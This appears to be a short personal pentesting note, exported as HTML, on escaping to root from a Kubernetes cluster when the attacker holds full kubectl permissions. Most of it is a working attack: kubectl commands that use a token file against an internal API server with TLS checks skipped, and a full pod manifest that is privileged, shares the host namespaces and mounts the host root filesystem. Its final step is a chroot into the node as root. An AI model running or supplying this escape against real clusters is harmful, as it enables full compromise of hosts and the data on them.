<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>everything-allowed</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>everything-allowed</h1>

      <div class="ck-content">
        <p>If you have <code>**</code> , everything allowed with kubectl, you can simply
          mount the host filesystem to a pod and become root on it. Here is the configuration
          yaml file, note the image has to be one that is available locally, if the
          machine doesn't have an internet connection.</p><pre><code class="language-text-plain">kubectl --token $(cat token) --insecure-skip-tls-verify --server=https://10.10.50.4:16443 -n default apply -f everything-allowed-exec-pod.yaml</code></pre><pre><code class="language-text-plain">kubectl --token $(cat token) --insecure-skip-tls-verify --server=https://10.10.50.4:16443 -n default exec -it everything-allowed-exec-pod -- chroot /host bash</code></pre><pre><code class="language-text-plain">apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: docker.io/vulhub/php:8.1-backdoor
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /</code></pre>
      </div>
    </div>
  </body>

</html>